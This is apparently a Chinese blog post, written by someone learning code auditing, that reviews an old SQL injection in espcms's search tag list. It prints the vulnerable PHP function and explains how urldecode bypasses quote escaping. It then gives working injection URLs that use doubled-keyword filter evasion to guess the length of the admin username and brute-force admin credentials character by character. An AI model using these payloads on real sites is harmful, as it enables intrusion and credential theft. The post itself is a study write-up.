审计espcms注入漏洞

    正在学习代码审计，动手审计了一下seay在2013年发现的espcms注入漏洞，记录下来：

    主要问题函数为interface/search.php中的in_taglist()函数：

function in_taglist() {parent::start_pagetemplate();include_once admin_ROOT . &＃39;public/class_pagebotton.php&＃39;;$page = $this->fun->accept(&＃39;page&＃39;, &＃39;G&＃39;);$page = isset($page) ? intval($page) : 1;$lng = (admin_LNG == &＃39;big5&＃39;) ? $this->CON[&＃39;is_lancode&＃39;] : admin_LNG;$tagkey = urldecode($this->fun->accept(&＃39;tagkey&＃39;, &＃39;R&＃39;));$db_where = &＃39; WHERE lng=\&＃39;&＃39; . $lng . &＃39;\&＃39; AND isclass=1&＃39;;if (empty($tagkey)) {$linkURL = $_SERVER[&＃39;HTTP_REFERER&＃39;];$this->callmessage($this->lng[&＃39;search_err&＃39;], $linkURL, $this->lng[&＃39;gobackbotton&＃39;]);}if (!empty($tagkey)) {$db_where.=" AND FIND_IN_SET(&＃39;$tagkey&＃39;,tags)";}$pagemax = 20;$pagesylte = 1;$templatesDIR = $this->get_templatesdir(&＃39;article&＃39;);$templatefilename = $lng . &＃39;/&＃39; . $templatesDIR . &＃39;/search&＃39;;$db_table = db_prefix . &＃39;document&＃39;;$countnum = $this->db_numrows($db_table, $db_where);if ($countnum > 0) {$numpage = ceil($countnum / $pagemax);} else {$numpage = 1;}$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";$this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON[&＃39;file_fileex&＃39;], 5, $this->lng[&＃39;pagebotton&＃39;], $this->lng[&＃39;gopageurl&＃39;], $this->CON[&＃39;is_rewrite&＃39;]);$sql = $this->htmlpage->PageSQL(&＃39;pid,did&＃39;, &＃39;down&＃39;);$rs = $this->db->query($sql);while ($rsList = $this->db->fetch_assoc($rs)) {$rsList[&＃39;typename&＃39;] = $this->get_type($rsList[&＃39;tid&＃39;], &＃39;typename&＃39;);$rsList[&＃39;link&＃39;] = $this->get_link(&＃39;doc&＃39;, $rsList, admin_LNG);$rsList[&＃39;buylink&＃39;] = $this->get_link(&＃39;buylink&＃39;, $rsList, admin_LNG);$rsList[&＃39;enqlink&＃39;] = $this->get_link(&＃39;enqlink&＃39;, $rsList, admin_LNG);$rsList[&＃39;ctitle&＃39;] = empty($rsList[&＃39;color&＃39;]) ? $rsList[&＃39;title&＃39;] : "" . $rsList[&＃39;title&＃39;] . "";$rsList[$keyname] = str_ireplace($keyword, &＃39;&＃39; . $keyword . &＃39;&＃39;, $rsList[$keyname]);$array[] = $rsList;}$this->pagetemplate->assign(&＃39;pagetext&＃39;, $this->htmlpage->PageStat($this->lng[&＃39;pagetext&＃39;]));$this->pagetemplate->assign(&＃39;pagebotton&＃39;, $this->htmlpage->PageList());$this->pagetemplate->assign(&＃39;pagenu&＃39;, $this->htmlpage->Bottonstyle(false));$this->pagetemplate->assign(&＃39;pagese&＃39;, $this->htmlpage->pageSelect());$this->pagetemplate->assign(&＃39;pagevt&＃39;, $this->htmlpage->Prevbotton());$this->pagetemplate->assign(&＃39;array&＃39;, $array);$this->pagetemplate->assign(&＃39;path&＃39;, &＃39;search&＃39;);unset($array, $typeread, $modelview, $LANPACK, $this->lng);$this->pagetemplate->display($templatefilename, &＃39;search&＃39;, false, $filename, admin_LNG);}

主要代码：

$tagkey = urldecode($this->fun->accept(&＃39;tagkey&＃39;, &＃39;R&＃39;));

$db_where.=" AND FIND_IN_SET(&＃39;$tagkey&＃39;,tags)";

$sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax";


$tagkey变量使用了urldecode，可以绕过GPC，最终$tagkey被带入SQL语句。

漏洞测试EXP：http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527

猜解用户名长度：

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1– by seay

爆破用户名和密码：

http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by seay

    最近才接触代码审计，看的眼疼。